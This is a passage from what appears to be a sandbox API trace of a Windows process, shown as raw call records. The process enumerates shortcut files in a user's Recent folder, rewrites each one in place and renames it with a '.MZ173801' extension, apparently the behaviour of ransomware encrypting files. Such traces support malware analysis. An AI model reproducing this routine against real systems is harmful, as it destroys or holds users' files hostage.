lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.679] GetCurrentThreadId () returned 0x1358 [0110.679] GetCurrentThreadId () returned 0x1358 [0110.679] GetCurrentThreadId () returned 0x1358 [0110.680] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.680] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.680] GetCurrentThreadId () returned 0x1358 [0110.680] GetCurrentThreadId () returned 0x1358 [0110.680] GetCurrentThreadId () returned 0x1358 [0110.681] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PuYC77t.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\puyc77t.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.681] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.681] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.681] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x399 [0110.681] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.681] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x399, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x399, lpOverlapped=0x0) returned 1 [0110.682] CloseHandle (hObject=0x3f4) returned 1 [0110.682] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PuYC77t.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\puyc77t.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.683] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x399, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x399, lpOverlapped=0x0) returned 1 [0110.684] CloseHandle (hObject=0x3f4) returned 1 [0110.691] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PuYC77t.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\puyc77t.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PuYC77t.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\puyc77t.lnk.mz173801")) returned 1 [0110.692] GetCurrentThreadId () returned 0x1358 [0110.692] GetCurrentThreadId () returned 0x1358 [0110.692] GetCurrentThreadId () returned 0x1358 [0110.692] GetCurrentThreadId () returned 0x1358 [0110.692] GetCurrentThreadId () returned 0x1358 [0110.692] GetCurrentThreadId () returned 0x1358 [0110.692] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead127bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xead127bc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xead5ee94, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Q2PT-p_KEzetPwQd hO2.lnk", cAlternateFileName="Q2PT-P~1.LNK")) returned 1 [0110.692] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.692] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.692] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Q2PT-p_KEzetPwQd hO2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\q2pt-p_kezetpwqd ho2.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead127bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xead127bc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xead5ee94, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x43a)) returned 1 [0110.693] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.693] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.693] GetCurrentThreadId () returned 0x1358 [0110.693] GetCurrentThreadId () returned 0x1358 [0110.693] GetCurrentThreadId () returned 0x1358 [0110.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.694] GetCurrentThreadId () returned 0x1358 [0110.694] GetCurrentThreadId () returned 0x1358 [0110.694] GetCurrentThreadId () returned 0x1358 [0110.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Q2PT-p_KEzetPwQd hO2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\q2pt-p_kezetpwqd ho2.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x43a [0110.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.695] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x43a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x43a, lpOverlapped=0x0) returned 1 [0110.696] CloseHandle (hObject=0x3f4) returned 1 [0110.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Q2PT-p_KEzetPwQd hO2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\q2pt-p_kezetpwqd ho2.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.698] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x43a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x43a, lpOverlapped=0x0) returned 1 [0110.699] CloseHandle (hObject=0x3f4) returned 1 [0110.701] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Q2PT-p_KEzetPwQd hO2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\q2pt-p_kezetpwqd ho2.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Q2PT-p_KEzetPwQd hO2.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\q2pt-p_kezetpwqd ho2.lnk.mz173801")) returned 1 [0110.702] GetCurrentThreadId () returned 0x1358 [0110.702] GetCurrentThreadId () returned 0x1358 [0110.702] GetCurrentThreadId () returned 0x1358 [0110.702] GetCurrentThreadId () returned 0x1358 [0110.702] GetCurrentThreadId () returned 0x1358 [0110.702] GetCurrentThreadId () returned 0x1358 [0110.702] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0328e9, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9c0328e9, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9c0328e9, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x539, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="qeFEt94 ZkESq80bTrZv.ots.lnk", cAlternateFileName="QEFET9~1.LNK")) returned 1 [0110.702] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: 